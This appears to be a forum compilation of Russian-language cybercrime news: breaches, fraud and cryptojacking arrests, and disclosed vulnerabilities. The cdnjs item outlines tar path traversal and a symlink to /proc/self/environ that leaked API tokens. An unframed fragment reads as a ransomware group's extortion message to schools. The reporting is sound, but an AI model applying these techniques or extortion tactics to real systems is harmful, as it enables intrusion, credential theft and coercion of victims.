По заявлению властей, предполагаемая российская кампания кибершпионажа использовала коррумпированное программное обеспечение SolarWinds и другие точки доступа для взлома как минимум девяти федеральных агентств и 100 компаний частного сектора.
Действующие и бывшие официальные лица заявили, что российские кибероперации используют правовые ограничения, которые обычно не позволяют Агентству национальной безопасности действовать полноценно для защиты национальных интересов. Хотя эти запреты предназначены для защиты прав на конфиденциальность американцев и американских предприятий, они означают, что иностранные злоумышленники, обосновавшиеся в IТ-инфраструктуре (например, облачном пространстве, размещенном на Amazon) США, могут избежать обнаружения. На слушаниях во вторник Смит назвал это своеобразным методом «пройти тест на IQ» для россиян.
• Source: [https://www.wsj.com/articles/amazon...gers- lawmakers-11614258004?mod=tech_lead_pos2](https://www.wsj.com/articles/amazons- lack-of-public-disclosure-on-solarwinds-hack-angers- lawmakers-11614258004?mod=tech_lead_pos2)
В предоставляемой компанией Cloudflare сети доставки контента cdnjs, предназначенной для ускорения доставки JavaScript-библиотек, [выявлена критическая уязвимость](https://blog.ryotak.me/post/cdnjs-remote-code- execution-en/), позволяющая выполнить произвольный код на серверах CDN. Опасность проблемы усугубляется тем, что для загрузки JavaScript-библиотек сервисом пользуется около 12.7% всех сайтов в интернете и компрометация инфраструктуры позволяет подменить библиотеки, отдаваемые любым из этих сайтов.
Сервис cdnjs осуществляет загрузку пакетов из Git или репозитория NPM, после чего даёт возможность любому сайту бесплатно воспользоваться сетью доставки контента Cloudflare для ускорения загрузки JavaScript-библиотек. При изучении кода компонентов cdnjs, опубликованных на GitHub, было выявлено, что для распаковки NPM-пакетов в архивах tgz используется штатный модуль archive/tar на языке Go, которые выдаёт список файлов как есть, без нормализации путей. В случае, когда скрипт распаковывает содержимое на основании выданного списка, наличие в архиве файлов вида "../../../../../../../tmp/test" может привести к перезаписи произвольных файлов в системе, насколько это позволяют права доступа.
Было предположено, что атакующий может подать заявку на добавление своей библиотеки в cdnjs и загрузить в репозиторий NPM специально оформленный архив, содержащий файлы с символами "../" в пути. На серверах cdnjs периодически выполняется операция "autoupdate", в ходе которой обработчик загружает новые версии предложенной библиотеки и распаковывает содержимое. При помощи файлов c путями "../" атакующий может добиться перезаписи файлов со скриптами сервиса и выполнения своего кода на сервере на котором производилась распаковка.
В случае загрузки обновлений из Git было выяснено, что загружающий обновления обработчик не учитывал символические ссылки при копировании файлов из Git. Данная особенность позволяла организовать чтение любых файлов с сервера через добавление в Git символических ссылок.
Эксперименты с демонстрацией взлома cdnjs для получения премии на HackerOne было решено начать с проверки гипотезы относительно чтения файлов. В Git- репозиторий отдаваемой через CDN JavaScript-библитеки была добавлена символическая ссылка test.js, указывающая на файл /proc/self/maps. После публикации новой версии библиотеки обработчик обновлений обработал данный репозиторий и опубликовал указанный файл в cdnjs (test.js был создан как символическая ссылка и при запросе данного файла выдавалось содержимое /proc/self/maps).
Подставив символическую ссылку на файл /proc/self/environ автор исследования заметил, что внутри отданных данных присутствуют значения переменных окружения GITHUB_REPO_API_KEY и WORKERS_KV_API_TOKEN. В первой переменной хранился ключ к API для доступа с правом записи в репозиторий robocdnjs на GitHub. Во второй переменной хранился токен к хранилищу KV в cdnjs. Воспользовавшись полученными сведениями злоумышленник мог внести изменения в cdnjs и полностью скомпрометировать инфраструктуру.
Проставил в соло сеть школ Luxemburg-Casco. Уехали два главных файл сервера.
Выходите на связь.
Как всегда данные детей в случае неоплаты не сливаем.
Сливаем только работников ответственных за факт возможности крипта школы
(айти, менеджмент и тп..)
С Janesville почти договорились, и с вами сможем.
Европол [сообщил](https://www.europol.europa.eu/media- press/newsroom/news/cryptojacker-arrested-in-ukraine-over-eur-1.8-million- mining-scheme) об аресте 29-летнего гражданина Украины, которого подозревают в организации масштабной криптоджекинговой схемы (личность подозреваемого не разглашается). Считается, что хакер с размахом эксплуатировал чужие облачные ресурсы: с помощью взломанных учетных записей подозреваемый создал 1 млн виртуальных серверов и использовал их для нелегальной добычи криптовалюты.
Правоохранители рассказали, что впервые информация об этой схеме появилась в январе 2023 года, когда неназванный провайдер облачных услуг обнаружил взлом учетных записей на своей платформе и занялся расследованием этого инцидента. В итоге весь прошедший год Европол, украинская полиция и представители провайдера совместно работали над сбором данных, которые могли бы использоваться для поиска и идентификации хакера.
По данным следствия, подозреваемый вел активную деятельность с 2021 года: именно тогда он впервые использовал собственные автоматизированные брутфорс- инструменты для подбора 1500 паролей от аккаунтов неназванной дочерней компании одного из крупнейших в мире поставщиков e-commerce решений.
После взлома злоумышленник использовал скомпрометированные учетные записи для получения административных привилегий и создания более миллиона виртуальных машин, которые затем использовались для добычи криптовалюты за чужой счет.
Известно, что подозреваемый использовал криптовалютные кошельки TON для перемещения своих незаконных доходов, а общая сумма транзакций составляет около 2 млн долларов США.
Теперь задержанного обвинят по статье, связанной с несанкционированным вмешательством в работу информационных, электронных коммуникаций и сетей электронных коммуникаций.
Стоит отметить, что криптоджекинг по-прежнему остается заметной проблемой, хотя расцвет таких атак пришелся на 2017-2018 годы. К примеру, согласно отчету компании Sysdig, в 2022 году криптоджекеры «зарабатывали» примерно 1 доллар в криптовалюте на каждые 53 доллара, потраченные организацией-жертвой.
Сотрудники испанской гражданской гвардии арестовали группу из 33 человек, которые обвиняются в совершении киберпреступлений. Совокупный ущерб от незаконной деятельности преступников оценивается в сумму около 400 тысяч евро.
Отмечается, что данные задержания прошли в рамках проведения очередной операции по борьбе с киберпреступностью.
По итогам этой операции еще семь человек находятся под следствием. Полицейский рейд был организован на территориях сразу четырех испанских провинций — речь идет об Аликанте, Валенсии, Мурсии и Мадриде.
Подозреваемым выдвинули обвинения в различных преступлениях, в том числе повреждении компьютерных систем, отмывании денежных средств и участии в преступной банде.
Уточняется, что расследование началось еще в мае нынешнего года после подачи многочисленных жалоб жителями Бургоса. В результате, полиция определила группу, которая занимается реализацией мошеннических схем и обманом людей по всей стране. В списке пострадавших есть минимум 16 жителей провинции Бургос.
Среди прочего, удалось заморозить несколько банковских счетов и вернуть украденные 133 500 евро. Это оценивается в одну треть от совокупного объема причиненного ущерба.
В правоохранительных структурах заявили, что злоумышленники задействовали несколько схем обмана. Так, зачастую они вступали в контакт с жертвами через социальные сети, а затем предлагали деньги в обмен на фотографии, продавали фальшивые билеты на мероприятия через сайты.
Кроме того, мошенники оформляли кредиты на чужие имена, предлагали фиктивные инвестиции в криптовалюты и занимались мошенничеством во время сделок купли- продажи.
lavanguardia.com/sociedad/20240914/9940406/detenidas-33-personas-operacion- cibercrimen-guardia-civil-estafar-400-000-euros-ep-agenciaslv20240914.html
Сотрудники Управления уголовного розыска УМВД России по Костромской области в результате оперативно-розыскных мероприятий вышли на след и задержали по месту жительства в Московской области 20-летнего студента-программиста, подозреваемого в участии в дистанционных мошенничествах.
По версии полиции, молодой человек на протяжении полутора лет занимался рекрутингом криминальных курьеров для телефонных аферистов, обманывавших граждан по схеме «Ваш родственник попал в ДТП». Он размещал в группах различных мессенджеров соответствующие объявления, отбирал кандидатов, которым затем разъяснял специфику предстоящей работы и меры конспирации. В дальнейшем рекрутер передавал мошенникам контакты посыльных, обученных похищать деньги у обманутых людей.
Предварительно установлено, что за время противоправной деятельности задержанный студент подготовил для аферистов не менее 20 пособников, среди которых оказались и несовершеннолетние. Некоторые из них приняли участие в хищении денег у нескольких жителей Костромской области.
Полицейские провели обыск по месту проживания криминального кадровика, где изъяли телефон и ноутбук, содержащие информацию о его преступных деяниях.
По материалам, собранным сотрудниками полиции, в отношении подозреваемого следственными органами были возбуждены уголовные дела по частям 2 и 3 статьи 159 Уголовного кодекса Российской Федерации. На время их расследования фигурант заключён под стражу.
• Video: https://rutube.ru/video/7d1636b7d39c2c83faf18d3d2c652a73/?r=plemwd
Московским (г. Минска) районным отделом Следственного комитета возбуждено уголовное дело о хищении имущества путем модификации компьютерной информации.
По данным следствия, в начале июня на мобильный телефон 41-летнего мужчины поступил звонок с иностранного номера. Незнакомец представился сотрудником оператора связи и сообщил, что на имя минчанина оформлена рассрочка. Далее он попросил проверить сходятся ли присланные в смс-сообщении цифры с последними 4 его абонентского номера. Символы оказались не идентичными, «представитель» компании извинился и сказал ожидать звонка из правоохранительных органов.
Буквально спустя минуту в мессенджере с мужчиной связался якобы представитель ДФР. «Сотрудник» финансовой милиции сообщил, что в настоящее время занимается расследованием уголовного дела о мошенничестве и выявил перечисления похищенных денег на счета, оформленные на имя минчанина. В ближайшее время по месту жительства мужчины проведут обыск, и чтобы не лишиться свободы на долгие годы лжеправоохранитель предложил ему срочно задекларировать все имеющиеся сбережения.
Потерпевший отпросился с работы, поехал домой и пересчитал наличность. О сумме, которая хранится дома он сообщил уже «следователю». Якобы представитель Следственного комитета позвонил ему в мессенджер по видеосвязи, предъявил удостоверение и поделился подробностями уголовного дела. Оказалось, что группа мошенников похищает денежные средства белорусов и переводит их на иностранные счета. Чтобы перейти из статуса подозреваемого в свидетеля, он предложил безотлагательно официально оформить хранящиеся дома деньги.
Для выполнения этой операции минчанина переадресовали к «консультанту Национального банка Республики Беларусь». Он убедил потерпевшего установить специализированное приложение удаленного доступа и передать ему данные для входа. Выполняя все беспрекословно мужчина собрал денежные средства (18 тысяч долларов) и отправился в отделение банка, чтобы пополнить счет.
Когда житель столицы выполнил это требование ему сообщили, что будет производится перевод денег на резервный счет Нацбанка и попросили не реагировать на приходящие уведомления о списании средств – все это процесс декларирования.
Затем последовал очередной звонок «представителя» банковского учреждения. Лжесотрудник сообщил, что данные единого лицевого счета минчанина стали известны мошенникам, в связи с чем на его имя оформлено 3 кредита на более чем 112 тысяч рублей. Единственный способ выйти из ситуации – оформить кредиты на те же суммы.
Не вдаваясь в подробности, мужчина выполнил и это требование. Он спокойно смотрел на экран своего мобильного, на который несколько часов приходили смс- уведомления о списании денег.
Когда все счета были пусты, псевдобанкир сообщил, что на следующий день с потерпевшим свяжется «следователь» и скажет где забрать наличные, а также оригиналы постановления на проведение обыска, справки об аннулировании кредитов. Как и полагается в таких случаях, аферисты сразу перестали выходить на связь. После этого пострадавший обратился в милицию. За 10 дней мошенникам удалось выманить у минчанина более 193 тысяч рублей.
Московским (г.Минска) районным отделом Следственного комитета возбуждено уголовное дело по ч.4 ст.212 (хищение имущества путем модификации компьютерной информации, совершенное в особо крупном размере) Уголовного кодекса Республики Беларусь. Следователи во взаимодействии с сотрудниками милиции устанавливают лиц, причастных к совершению преступления.
Национальные власти Австрии, Кипра и Чехии провели мерояриятия по борьбе с онлайн-мошенничеством c "продажей токены новой криптовалюты". В ходе скоординированной операции, проведенной при поддержке Евроюста и Европола, были арестованы шесть основных подозреваемых и проведены обыски в шести местах. В общей сложности были заморожены/арестованы активы на сумму 750 тысяч евро, имущество на сумму 1,4 миллиона евро и два автомобиля, сообщает eurojust.europa.eu.
В период с декабря 2017 года по февраль 2018 года мошенники притворялись, что создали компанию онлайн-торговли, которая запустила новую криптовалюту. Они предложили на продажу 10 миллионов токенов. Инвесторы платили им обычными криптовалютами, такими как биткойны или эфириум. Австрийские мошенники также утверждали, что разработали собственное программное обеспечение и алгоритм для продажи токенов, чтобы завоевать доверие инвесторов.
В феврале 2018 года злоумышленники закрыли все свои аккаунты в социальных сетях и отключили домашнюю страницу фейковой компании. Инвесторы потеряли около 6 миллионов евро. На данном этапе выявлены не все жертвы мошенничества.
В итоге удалось выявить организаторов и быстро выполнить европейские ордеры на арест и обыски. Европол помог в работе мобильного офиса на Кипре. Австрийские полицейские присутствовали на месте обыска на Кипре.
eurojust.europa.eu/news/take-down-austrian-based-fraud-scheme-offering-new- type-crypto-coin
Правоохранительные органы Китая заявили о раскрытии крупной подпольной сети отмывания денег с использованием виртуальных активов. Создатели и операторы обменника уже арестованы.
В ноябре 2022 года в поле зрения полиции города Циндао провинции Шаньдун попали банковские счета физических лиц с нестандартным поведением и аномально высокими оборотами, не соответствующими социальному статусу владельцев аккаунтов. Были замечены частые приходные и расходные операции с ежедневным оборотом, превышающим 30 млн юаней (более $4 млн).
Сотрудники Бюро общественной безопасности Циндао выявили взаимосвязь подозрительных аккаунтов и операций с криптовалютами на зарубежной платформе для торговли виртуальными активами. В общей сложности через подозрительные счета прошли транзакции на сумму 158 млрд юаней (около $25 млрд).
Получив веские доказательства, полиция Циндао приняла меры по задержанию владельцев счетов. Часть этих людей оказались дропперами. Полицейские конфисковали денежные средства и виртуальные активы. Сообщается, что оперативные мероприятия затронули 17 провинций по всей стране.
Российскую актрису Рамилю Иcкандер, которая подарила свой голос паре десятков персонажей из популярных видеоигр («Mass Effect», «World of Warcraft», «Ведьмак», «Diablo 3» и т.д.) , обвинили в управлении крупным наркошопом в даркнете.
По версии следствия, 46-летняя Рамиля открыла свой собственный наркошоп на одном из популярных маркетплейсов (к сожалению название не уточняется) и руководила аж 60-ю закладчиками. Ранее ее арестовали по делу о покушении на сбыт мефедрона, при этом следователь отметил, что отвечать на вопрос о своей причастности к распространению наркотиков она отказалась, но вот на своих коллег стучит весьма охотно.
Тем не менее, Искандер активно поддерживают другие актеры — они прислали в суд коллективное письмо о том, что она добропорядочная, законопослушная гражданка и вообще, скорее ее отпустите. На данный момент ей продлили арест в СИЗО до 22-го декабря.
Что думать о группе Anonymous Sudan? Я не совсем понимаю их цели!
///
Требования Anonymous Sudan вызывают беспокойство у компетентных органов
власти. Причина? Карикатуры на пророка Мухаммеда. Связавшись с Numerama,
коллектив хактивистов упомянул сатирический журнал Charlie Hebdo. Тем не
менее, другая причина могла побудить группу хакеров на эту цифровую атаку:
поддержка Францией Украины. Anonymous Sudan связан с Killnet, коллективом
российских хактивистов, поддерживаемым режимом Путина. В ответ на вопрос
Numerama на эту тему, коллектив ответил: "Мне безразличны поддержки в
отношении Украины. В случае нападения со стороны Killnet, я немедленно нападу
с ними, чтобы помочь. […] Россия помогала Судану в прошлом, поэтому мы
помогаем российской команде Killnet".
///
В г. Чернигов и г. Городняя киберполиция за процессуальным руководством прокуратуры разоблачили группу мошенников, которые выдавали себя за представителей службы безопасности банка, получали персональные данные владельцев банковских карт, после чего завладевали средствами потерпевших.
Кроме того, злоумышленники занимались незаконным распространением баз персональных данных клиентов банковских и других учреждений.
Об этом сообщает пресслужба Черниговской областной прокуратуры.
Мошеннические действия злоумышленники совершали как за рубежом, так и в Украине.
В ходе проведенных санкционированных обысков изъята компьютерная техника, мобильные телефоны, десятки SIM-карт отечественных и зарубежных мобильных операторов разных стран и банковских карт.
Открыто уголовное производство начато по ч. 3 ст. 190 УК Украины (мошенничество).
Сейчас решается вопрос о сообщении о подозрении по указанному факту мошенничества нескольким жителям области.
• Source: <https://newch.tv/mizhnarodnu-hrupu-internet-shakhraiv-vykryly-na- chernihivshchyni-46915/>
Ukraine is formally pointing fingers at Russian hackers for hacking into one of its government systems and attempting to plant and distribute malicious documents that would install malware on target systems of public authorities.
"The purpose of the attack was the mass contamination of information resources of public authorities, as this system is used for the circulation of documents in most public authorities," the National Security and Defense Council of Ukraine (NSDC) said in a statement published on Wednesday.
The NSDC's National Coordination Center for Cybersecurity (NCCC) termed it a supply chain attack aimed at the System of Electronic Interaction of Executive Bodies (SEI EB), which is used to distribute documents to officials.
Calling it a work of threat actors with ties to Russia, the NSDC said the malicious documents came embedded with a macro that, when opened, stealthily downloaded malicious code to control the compromised system remotely.
"The methods and means of carrying out this cyberattack allow to connect it with one of the hacker spy groups from the Russian Federation," the agency said.
While the NSDC did not take any names, it's not immediately clear when the attack took place, how long the breach lasted, and if any of the infections were successful.
The development comes two days after the NSDC and NCCC warned of massive distributed denial-of-service (DDoS) attacks singling out websites belonging to the security and defense sector, including that of the NSDC.
"It was revealed that addresses belonging to certain Russian traffic networks were the source of these coordinated attacks," the NSDC said, while stopping short of directly accusing the country.
The NCCC also stated the "attackers used a new mechanism of cyberattacks" that involved using a previously undocumented strain of malware that was planted on vulnerable Ukrainian government servers, and in the process, coopted the devices into an attacker-controlled botnet.
The infected systems were then used to carry out further DDoS attacks on other Ukrainian sites, the agency said.
Malwarebytes today announced the findings of its annual "State of Malware" report. The latest report explores how the global pandemic forced many employees to quickly become a remote workforce and confined consumers to their homes. In the wake of this change, cybercriminals ditched many of their old tactics, placing a new emphasis on gathering intelligence, and exploiting and preying upon fears with targeted and sophisticated attacks. As a result, the State of Malware Report found a notable shift in the devices targeted and strategies deployed by cybercriminals.
https://resources.malwarebytes.com/files/2021/02/MWB_StateOfMalwareReport2021.pdf
Врачи из Института сердца и сосудов имени Генри Форда (при больнице Генри Форда в Детройте) опубликовали статью, в которой предупреждают, что технология MagSafe в iPhone нового поколения может влиять на работу таких имплантируемых устройств, как кардиовертеры-дефибрилляторы (ИКД). Особенно если «пациент носит телефон в верхнем нагрудном кармане».
Магниты, расположенные в iPhone по кругу, играют важную роль в выравнивании девайса при зарядке беспроводным устройством MagSafe. Также Apple представила множество аксессуаров с поддержкой MagSafe (от чехлов до мини-кошельков для наличных и кредитных карт).
Еще в 2009 году медики выяснили, что любые магниты, а также радио и электронное оборудование, генерирующие магнитное поле мощнее 10 Гс, могут влиять на работу систем внутри кардиовертеров-дефибрилляторов и останавливать их работу. Теперь же врачи провели тесты с новыми iPhone и обнаружили, что новые магниты достаточно сильны, чтобы вызывать опасные сбои.
«Когда iPhone был поднесен близко к ИКД над левой частью груди, была отмечена немедленная приостановка терапии ИКД, которая сохранялась на протяжении всего теста. Этот результат был воспроизведен несколько раз с различным положением телефона в кармане», — гласит статья.
Click to expand...

При этом ранее компания Apple сообщала, что новые модели iPhone не будут представлять бóльший риск для медицинских устройств, чем модели предыдущие. Но как теперь продемонстрировали медики, это неправда. Впрочем, Apple все же советовала пользователям держать iPhone и зарядные устройства MagSafe на безопасном расстоянии от имплантатов, (более 30 см), а в случае любых подозрений немедленно прекратить использование iPhone или аксессуаров MagSafe.
Источник: xakep.ru/2021/02/09/iphone-magnets/
Жительница Ирбита лишилась полумиллиона рублей после звонка сотрудника
«Госуслуг».
Всё произошло в конце сентября. 24-летней девушке поступили два звонка на
WhatsApp, на аватарке контакта красовался логотип госпортала. Решив, что
мошенники не будут звонить дважды, она приняла вызов.
Звонящий сообщил, что мошенники пытаются оформить кредит на имя девушки. Чтобы
избежать кражи, ей нужно отправить все свои средства на «секретные ячейки
банка». Пострадавшая последовала инструкциям и перевела на счет аферистов 110
тысяч рублей. На следующий день поступил очередной звонок: теперь девушку
попросили взять кредит, а полученные деньги вновь отправить на «безопасный
счет».
— Потерпевшая оформила кредит на сумму 598 802 рубля и перевела мошенникам 269
тысяч рублей, после чего перестала переводить деньги, так как решила, что
очень подозрительно переводить деньги на разные номера телефонов, — пояснили в
полиции. — Мужчина начал ее успокаивать, утверждая, что это для ее же
безопасности. Тогда потерпевшая отправилась к другому банкомату и перевела там
еще 180 тысяч рублей.
В общей сумме девушка отправила мошенникам 559 тысяч.
Только после этого она решила найти номер своего банка и проверить,
действительно ли ее средства в безопасности. Узнав, что она попалась на уловку
преступников, пострадавшая обратилась в полицию.
Возрастная жительница Дмитрова получила звонок от подруги, которая утверждала, что причастна к автомобильной аварии с пострадавшим. Чтобы избежать уголовной ответственности, она попросила 100 тысяч рублей. Деньги были переданы курьеру. Им оказался мужчина, который недавно нашел работу в Телеграме. Он отвозил деньги по адресам, которые сообщал работодатель.
Однако, когда женщина связалась с подругой повторно, та заявила, что находилась дома и не управляла автомобилем.
Мужчина, которому была передана сумка с деньгами, был задержан и набутылен полицией.
Полиция в Москве задержала банду телефонных мошенников, обманувших сотню пенсионеров более чем на 100 миллионов рублей, сообщила журналистам во вторник официальный представитель МВД России Ирина Волк.
Аферисты арендовали офис в одном из бизнес-центров на Одесской улице в Москве. Там они организовали работу колл-центра: мошенники звонили обманутым вкладчикам и предлагали им юридическую помощь в возврате денег. Пенсионеры, доверившись злоумышленникам, отдавали им свои сбережения.
"Полицейские задержали семерых соучастников, возраст которых варьируется от 22 до 48 лет. Трое из них ранее привлекались к уголовной ответственности... В настоящее время потерпевшими признаны более 100 граждан пожилого возраста. Общая сумма причиненного им ущерба превышает 100 миллионов рублей", - рассказала она.
Возбуждено уголовное дело. Задержанным по статье "Мошенничество в особо крупном размере" грозит до десяти лет лишения свободы.
source: mvdmedia.ru/news/ofitsialnyy-predstavitel/irina-volk-na-yugo-zapade- stolitsy-politseyskie-zaderzhali-rabotnikov-kol-tsentra-po-podozreniyu-v-m
Цель злоумышленника – удалить данные и принести финансовые потери компании
Злоумышленник атаковал незащищенные базы данных Elasticsearch и заменил 450 индексов записками с требованием выкупа, требуя $620 за восстановление содержимого. Общая сумма выкупа составляет $279 тыс.
Киберпреступник угрожал удвоить сумму выкупа, если жертва не заплатит деньги в течение 7 дней. Злоумышленник также заявлял, что через 2 недели удалит индексы жертвы, если выкуп не будет оплачен. Тем, кто заплатит сумму, киберпреступник обещал дать ссылку на скачивание дампа базы данных, который якобы поможет быстро восстановить структуру данных в первоначальный вид.
«Стоимость хранения баз данных будет непомерно дорогой. Поэтому вполне вероятно, что данные не были скопированы и что выплата выкупа не восстановит их», - сказали исследователи из Secureworks .
Злоумышленник просто удалил содержимое незащищенной базы данных и оставил записку с требованием выкупа, надеясь, что жертва поверит заявлению киберпреступника. На данный момент на один биткоин-кошелек, указанный в записке, поступил один платеж.
Для организаций потеря всей информации приведет к значительным финансовым потерям. Некоторые из этих баз данных поддерживают онлайн-сервисы, поэтому есть риск сбоев в бизнесе, которые могут стоить намного больше, чем сумма выкупа. Кроме того, злоумышленник может использовать украденные данные для продажи в Даркнете .
source: elastic.co/elasticsearch | secureworks.com/blog/unsecured-elasticsearch-data-replaced-with-ransom-note
ProtonMail предоставил данные о дате создания аккаунта, связанных с ним IP- адресах и устройствах, с которых осуществлялся вход в аккаунт.
ProtonMail раскрыл IP-адреса ряда своих французских пользователей, связанных с «зеленым» движением Youth for Climate. Данные были предоставлены по запросу властей Франции, после чего эти пользователи оказались под арестом. Об этом сообщает TechCrunch.
Между тем в политике конфиденциальности ProtonMail говорится, что компания «по умолчанию не ведет журналы IP», а «для создания защищенной учетной записи электронной почты не требуется никакой личной информации».
В ProtonMail пояснили, что IP-адреса всё же собираются, «но не по умолчанию», а согласно законодательству Швейцарии, где расположены штаб-квартира и серверы компании-владельца сервиса. Запрос на раскрытие данных, связанных с почтовым аккаунтом, через который общались активисты, был направлен Францией в Европол, а оттуда – в Швейцарию, которая и потребовала передать эту информацию.
Под давлением властей Швейцарии ProtonMail предоставил данные о дате создания аккаунта, связанных с ним IP-адресах и устройствах, с которых осуществлялся вход в аккаунт.
После предоставления запрошенных данных французские власти арестовали участников Youth for Climate.
ProtonMail обновил пользовательское соглашение после скандала с арестом активиста
Club ](https://nnmclub.to/forum/viewtopic.php?t=1494331)
ProtonMail сдал своих пользователей-активистов властям Франции
nnmclub.to
Сотрудники отдела уголовного розыска ОМВД России по Пригородному району совместно с коллегами из Республики Марий-Эл задержали двух подозреваемых в мошенничестве.
Осетинские оперативники установили, что двое молодых жителей Йошкар-Олы под видом брокеров разместили в сети Интернет сайт, а также организовали call- центр, откуда звонили потенциальным жертвам. Они предлагали помощь во вложении денежных средств в фондовый рынок.
Заманчивые предложения соблазнили жителя с. Октябрьское. Мужчина, увидев в Интернете рекламный баннер «выгодных» брокерских предложений, оставил на сайте свой номер телефона, мошенники тут же связались с ним. Представившись фондовыми торговцами, аферисты предложили вложить деньги в фондовую биржу, перечислив их на различные банковские счета, утверждая, чем больше вклад, тем больше выгода. Так, мужчина перевел на указанные счета больше двух миллионов рублей посредством банковской карты и терминалов. Когда, не получив обещанной выгоды, мужчина попытался вернуть свои средства, это оказалось невозможно - «фондовые торговцы» перестали выходить на связь, их телефоны были выключены. Осознав, что попался на уловки мошенников, житель с. Октябрьское обратился в полицию.
Полицейские ОМВД России по Пригородному району в ходе оперативно-розыскных мероприятий установили личности и местонахождение злоумышленников. Ими оказались молодой человек и девушка в возрасте 29 и 23 лет. Оперативники Пригородного района выехали в служебную командировку в Марий-Эл, где совместно с коллегами задержали подозреваемых.
Задержанные дали признательные показания. В настоящее время возбуждено уголовное дело по ч. 3 ст. 159 УК РФ «Мошенничество в крупном размере». Прорабатываются версии причастности подозреваемых к аналогичным преступлениям по всей территории России.
• Video: мвд.рф/news/item/25754598/
В своем новом отчете эксперты исследовательского центра Citizen Lab Университета Торонто рассказали о ранее неизвестной уязвимости в iOS, проэксплуатировать которую можно с помощью всего лишь одного нажатия. Согласно отчету, с февраля 2021 года уязвимость использовалась в атаках на нескольких активистов и диссидентов в Бахрейне.
Эксперты связали новый эксплоит с израильским производителем коммерческого шпионского ПО NSO Group, который в последнее время регулярно упоминается в СМИ в связи со слежкой за активистами и журналистами.
FORCEDENTRY является одной из нескольких уязвимостей, эксплуатировавшихся для заражения устройств инструментом для слежения Pegasus от NSO Group. По словам специалистов, FORCEDENTRY использовалась в более широкой хакерской кампании, начавшейся в июле 2021 года и затронувшей как минимум девять бахрейнских активистов.
«Как минимум четыре активиста были атакованы LULU – оператором Pegasus, которого можно с большой уверенностью отнести к правительству Бахрейна, известного своими злоупотреблениями шпионским ПО», – сообщается в отчете.
В данной хакерской кампании FORCEDENTRY не была главной эксплуатирующейся уязвимостью. Атака осуществлялась в три этапа, и похоже, что эксплоит для FORCEDENTRY был разработан ранее в нынешнем году для обхода новых функций, представленные Apple в iOS 14.
В настоящее время подробности об уязвимости iMessage, эксплуатировавшейся FORCEDENTRY, не раскрываются, в основном из-за того, что она еще не исправлена. На данный момент об уязвимости известно следующее:
FORCEDENTRY – эксплоит в один клик (zero-click). То есть, всего лишь получив от злоумышленника вредоносного сообщение в iMessage, жертва может заразить свой iPhone вредоносным ПО. То есть, не нужно нажимать на ссылку в сообщении или даже читать его;
FORCEDENTRY может обходить BlastDoor – новую функцию безопасности, тайно добавленную Apple в iOS 14 в прошлом году. Она работает путем помещения некоторых элементов iMessage в песочницу с целью изоляции получаемого в сообщениях вредоносного кода от взаимодействия с ОС;
FORCEDENTRY использовался в атаках на версии iOS 14.4 и 14.6, однако эксплоит также может работать и на текущих версиях iOS;
FORCEDENTRY также использовался в атаках на пользователей во Франции и Индии.
• Source: <https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso- group-zero-click-iphone-exploits/>
Голландская ИБ-компания EYE сообщает, что тысячи «умных» сигнализаций ABUS Secvest содержат неисправленные уязвимости, которые позволяют злоумышленникам удаленно отключать охранную систему перед совершением кражи и взлома с проникновением.
Проблему эксперты EYE обнаружили еще прошлой осенью. Тогда, по их подсчетам, в сети можно было обнаружить примерно 11 000 уязвимых сигнализаций. И хотя разработчики ABUS исправил эту проблему еще в январе 2021, спустя почти четыре месяца более 90% (около 10 000) клиентов по-прежнему не установили патчи.
По словам исследователей, большинство уязвимых систем находится в Германии, а еще несколько сотен распространены в других странах, включая Австрию и Швейцарию, а прочие страны Бенилюкса.
Страна| Количество систем
---|---
Германия| 10,184
Швейцария| 445
Австрия| 426
Нидерланды| 376
Люксембург| 89
Франция| 37
Бельгия| 35
Другая| 87
Итого| 11 679
Баг был выявлен в панели веб-администрирования ABUS Secvest которую клиенты могут использовать через браузер или мобильное приложение для управления охранной системой. Дело в том, что HTTPS-запрос на деактивацию системы требует аутентификации, однако многие другие запросы не требуют.
К примеру, злоумышленники может отправить сигнализации веб-запрос и приказать ей включить сирену, которая будет издавать громкий звук в домах или на рабочих местах. В теории этот процесс можно автоматизировать, и спровоцировать срабатывание множества систем безопасности по всей Германии и Западной Европе.
Также атакующий может использовать баг для загрузки файла конфигурации ABUS Secvest, а это может вызвать уже совсем другие проблемы. Поскольку файл содержит имена и пароли всех пользователей, зарегистрированных в системе, у злоумышленника появятся необходимые учетные данные для подключения к сигнализации, после чего ее можно будет попросту деактивировать.
Кроме того, исследователи пишут, что информация из файла конфигурации (имя системы охранной сигнализации, IP-адрес, доступ к каналам камер и многое другое) может использоваться для определения физического местоположения системы. Таким образом, преступники могут заранее подготовиться и выбрать более «ценный» объект для атаки. Также они могут отключить или подменить трансляцию с камер наблюдения, и в итоге даже не попадут на видео во время проникновения в здание.

К сожалению, для установки обновленной прошивки, где эти проблемы исправлены, требуются специальные права, которыми многие владельцы сигнализаций просто не обладают (например, если сигнализация была установлена сторонней компанией). Исследователи считают, что именно в этом кроется возможная причина крайне медленной установки патчей.
Источник: xakep.ru/2021/04/26/abus-secvest/
Киберфаховцы Службы безопасности совместно с БЭБ заблокировали масштабный канал оборота средств между рф и Украиной, который функционировал с помощью криптовалютных технологий и запрещенных российских платежных систем.
В 4 регионах прекращена деятельность сети подпольных конвертационных центров, через каждый из которых ежемесячно «проходило» более одного миллиона долларов США.
Дельцы пользовались подсанкционными российскими системами переводов Юmoney, Webmoney и криптовалютой.
Они предоставляли услуги вывода с территории РФ российского рубля через его конвертирование в криптовалюту и обналичивание в гривну.
Основными клиентами злоумышленников были хакеры и представители коммерческих структур, которые проводили теневые товаро-обменные и финансовые операции со страной-агрессором.
Обналичивание криптовалюты осуществляли в подпольных конвертцентрах, которые действовали как пункты обмена валют в Киеве, Харькове, Ровно и Сумах.
Во время обысков по адресам проживания и работы фигурантов обнаружено:
▪ − почти 60 млн в гривневом эквиваленте;
▪ − оборудование, которое дельцы использовали в незаконной деятельности.
Сейчас одному из участников сделки сообщено о подозрении по ст. 200 Уголовного кодекса Украины (незаконные действия с документами на перевод, платежными карточками и другими средствами доступа к банковским счетам, электронными деньгами, оборудованием для их изготовления).
Продолжается расследование для установления всех обстоятельств преступления и привлечения к ответственности других участников незаконной деятельности.
Комплексные мероприятия проводились при процессуальном руководстве Офиса Генерального прокурора.
Как стало известно TechCrunch, за последний год компания Yahoo уволила около 25% своей команды кибербезопасности, известной как «Paranoids».
